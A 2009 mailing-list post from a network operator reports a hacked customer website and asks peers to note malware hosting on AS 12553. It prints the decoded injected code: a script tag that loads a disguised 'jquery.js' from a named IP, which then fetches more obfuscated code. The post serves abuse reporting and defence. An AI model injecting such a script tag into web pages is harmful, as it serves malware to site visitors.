[nsp-sec] ATTN AS 12553 malware hosting
Mike Tancsa
mike at sentex.net
Wed Apr 8 10:47:11 EDT 2009
Of our our customer Windows based websites was hacked (still looking
for the initial vector)... On their html pages, some obfuscated js
code was installed that translates to
<script src = //94.247.2.195 / jquery.js> </script>
which then downloads other stuff via obfuscated js code. Havent had
a chance to go through it yet.
AS | IP | AS Name
12553 | 94.247.2.195 | PCEXPRESS-AS _DATORU EXPRESS SERVISS_ Ltd.
---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
More information about the nsp-security
mailing list